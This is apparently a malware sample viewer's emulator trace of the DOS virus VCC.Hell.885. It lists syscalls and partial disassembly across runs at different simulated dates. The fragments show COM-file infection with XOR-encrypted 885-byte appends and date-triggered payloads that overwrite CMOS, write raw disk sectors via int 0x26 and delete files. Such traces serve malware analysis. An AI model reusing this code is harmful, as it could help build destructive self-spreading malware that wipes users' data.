Sample viewer

vx.netlux.org/Virus.DOS.VCC.Hell.885

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:04:26.565373079Z 26 PC: 12a73 | Set disk transfer address
2018-12-17T23:04:26.567191888Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:04:26.569221302Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:04:26.570904538Z 78 PC: 12ad1 | Find first file
2018-12-17T23:04:26.577937779Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:04:26.586079352Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:26.593492966Z 66 PC: 12d67 | Move file pointer
2018-12-17T23:04:26.595457555Z 66 PC: 12d76 | Move file pointer
2018-12-17T23:04:26.598189067Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:26.614742675Z 66 PC: 12d8e | Move file pointer
2018-12-17T23:04:26.617370674Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-17T23:04:26.621181319Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-17T23:04:26.657535705Z 62 PC: 12dab | Close file
2018-12-17T23:04:26.666861083Z 79 PC: 12ad1 | Find next file
2018-12-17T23:04:26.670784328Z 61 PC: 12d49 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:04:26.678810478Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:26.686839413Z 66 PC: 12d67 | Move file pointer
2018-12-17T23:04:26.688475881Z 66 PC: 12d76 | Move file pointer
2018-12-17T23:04:26.691954721Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:26.695726884Z 66 PC: 12d8e | Move file pointer
2018-12-17T23:04:26.698132803Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0x48
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-17T23:04:26.701986137Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-17T23:04:26.712267538Z 62 PC: 12dab | Close file
2018-12-17T23:04:26.722264485Z 79 PC: 12ad1 | Find next file
2018-12-17T23:04:26.725402116Z 61 PC: 12d49 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:04:26.738679326Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:26.747351429Z 66 PC: 12d67 | Move file pointer
2018-12-17T23:04:26.749079535Z 66 PC: 12d76 | Move file pointer
2018-12-17T23:04:26.750715476Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:26.754443096Z 66 PC: 12d8e | Move file pointer
2018-12-17T23:04:26.756388502Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0x48
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-17T23:04:26.7594727Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-17T23:04:26.770407397Z 62 PC: 12dab | Close file
2018-12-17T23:04:26.779798827Z 79 PC: 12ad1 | Find next file
2018-12-17T23:04:26.783127817Z 61 PC: 12d49 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:04:26.79163773Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:26.799517505Z 66 PC: 12d67 | Move file pointer
2018-12-17T23:04:26.801524309Z 66 PC: 12d76 | Move file pointer
2018-12-17T23:04:26.803816784Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:26.807414371Z 66 PC: 12d8e | Move file pointer
2018-12-17T23:04:26.809403563Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0x4e
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-17T23:04:26.812702298Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-17T23:04:26.823089681Z 62 PC: 12dab | Close file
2018-12-17T23:04:26.832609352Z 79 PC: 12ad1 | Find next file
2018-12-17T23:04:26.836327736Z 61 PC: 12d49 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:04:26.844915408Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:26.852289195Z 66 PC: 12d67 | Move file pointer
2018-12-17T23:04:26.854218896Z 66 PC: 12d76 | Move file pointer
2018-12-17T23:04:26.856445619Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:26.859724535Z 66 PC: 12d8e | Move file pointer
2018-12-17T23:04:26.861645187Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0x53
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-17T23:04:26.865597838Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-17T23:04:26.875353734Z 62 PC: 12dab | Close file
2018-12-17T23:04:26.884809516Z 26 PC: 12aeb | Set disk transfer address
2018-12-17T23:04:26.886906774Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-17T23:04:26.889553886Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-17T23:04:26.892327958Z 25 PC: 12b3f | Get default drive
2018-12-17T23:04:26.896353634Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-17T23:04:26.898855658Z 19 PC: 12b55 | Delete file
2018-12-17T23:04:26.909484383Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:53.608838156Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:53.610731739Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:53.612815535Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:53.614176831Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:53.621214735Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:53.628070534Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:53.634547378Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:53.636497644Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:53.642998397Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:53.645586085Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:53.646849312Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:53.649482135Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:53.672954624Z 62 PC: 12dab | Close file
2018-12-25T12:41:53.680607456Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.683697485Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.690259773Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.696585349Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.699233321Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.700432947Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.70282429Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.710400173Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.713071934Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.721023758Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.730586697Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.733411096Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.739374771Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.743976445Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.745004608Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.746006157Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.748344001Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.749364946Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.751142833Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.758931644Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.764479023Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.767362696Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.774549169Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.781176673Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.782719291Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.7851929Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.788022443Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.789574309Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.792404134Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.801281738Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.809228041Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.811857166Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.818894416Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.825193067Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.826799888Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.829111623Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.831507662Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.83284423Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.835997424Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.844352958Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.852355676Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:53.854423025Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:53.857093989Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:53.85918262Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:53.8623703Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:53.625990874Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:53.628267745Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:53.629501304Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:53.630833276Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:53.6374326Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:53.644700922Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:53.650818995Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:53.652488082Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:53.654985135Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:53.657827932Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:53.65925492Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:53.661257122Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:53.681493296Z 62 PC: 12dab | Close file
2018-12-25T12:41:53.689157171Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.692789448Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.700341855Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.706371277Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.70855787Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.710065742Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.712764369Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.715217685Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.717705675Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.726094063Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.734397835Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.737582497Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.744301411Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.750868923Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.755994819Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.757370389Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.760058239Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.762160273Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.764679967Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.774055085Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.78558999Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.788494687Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.794861992Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.802049458Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.803628648Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.805232013Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.808669945Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.810407845Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.812957223Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.8219315Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.829876501Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.832699858Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.845788723Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.852275402Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.854293797Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.856004901Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.859857186Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.861338559Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.863666545Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.872264707Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.880027803Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:53.881300201Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:53.883943281Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:53.886310151Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:53.88869544Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:53.895126017Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":14,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:54.240014121Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:54.241675512Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:54.242738657Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:54.243724268Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:54.250535329Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:54.256776262Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:54.263716163Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:54.265358395Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:54.2678683Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:54.270853523Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:54.272479009Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:54.276107863Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:54.291086209Z 62 PC: 12dab | Close file
2018-12-25T12:41:54.299767817Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.303805838Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.310944314Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.317842236Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.320157788Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.322186487Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.325434325Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.32784113Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.330888983Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.339177755Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.347085356Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.350583754Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.358911671Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.371146645Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.376777382Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.378526333Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.381104517Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.38306195Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.385497479Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.393653443Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.402295475Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.404903275Z 61 PC: 12d49 | Open file (See above)
